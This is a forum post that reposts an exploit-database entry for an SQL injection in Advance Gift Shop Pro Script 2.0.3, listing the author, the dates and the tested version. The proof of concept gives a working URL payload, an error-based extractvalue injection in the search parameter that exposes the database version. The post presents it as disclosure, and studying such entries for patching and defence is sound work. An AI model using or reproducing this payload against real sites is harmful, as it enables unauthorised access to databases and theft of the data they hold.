Jump to content

Advance Gift Shop Pro Script 2.0.3 - SQL Injection

KaiWn

By KaiWn,
in CHT Vulnerability database

Recommended Posts

KaiWn Proficient

KaiWn

Posted
  • Group:  team members
  • Content Count:  564
  • Achievement Points:  3,754
  • With Us For:  158 Days
  • Status:  Offline
  • Last Seen:  
  • Device:  Windows
Posted 
# Exploit Title: Advance Gift Shop Pro Script 2.0.3 - SQL Injection
# Exploit Author: Mr Winst0n
# Author E-mail: manamtabeshekan[@]gmail[.]com
# Discovery Date: February 21, 2019
# Vendor Homepage: http://www.phpscriptsmall.com/
# Software Link : https://www.phpscriptsmall.com/product/gifts-shop/
# Tested Version: 2.0.3
# Tested on: Kali linux, Windows 8.1 


# PoC:

# http://localhost/[PATH]/?category=&s=[SQL]&search_posttype=product
# http://localhost/[PATH]/?category=&s=1%20and%20extractvalue(rand(),concat(0x7e,version()))&search_posttype=product
Link to comment
Share on other sites
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...